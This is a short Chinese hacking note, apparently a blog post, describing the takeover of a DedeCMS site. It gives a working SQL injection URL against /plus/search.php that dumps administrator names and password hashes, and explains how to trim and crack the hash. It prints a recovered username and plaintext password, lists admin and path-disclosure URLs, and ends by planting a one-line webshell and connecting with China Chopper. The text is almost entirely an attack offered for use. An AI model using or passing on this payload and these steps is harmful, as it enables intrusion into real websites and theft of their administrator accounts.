记某一织梦CMS拿webshell
用/plus/search.php?keyword=astypeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,
12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=as
爆出用户名和密码。。。
得到的是20位的MD5,去掉前3位和最后1位,然后就是16位的MD5值了
xzs123
22e802dc800df6aa0591 →802dc800df6aa059
查询网址:http://cracker.blackbap.org/?do=home
MD5(16位)为 802dc800df6aa059
明文为 QAZqaz123@
好了,登陆 。。。
默认后台:/dede
如果找不到可以试试老版本爆织梦路径的方法:
/include/dialog/select_soft.php
/include/dialog/config.php
include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
新建模块,弄个一句话,菜刀链接,剩下的就不说了。。。
拿到webshell后: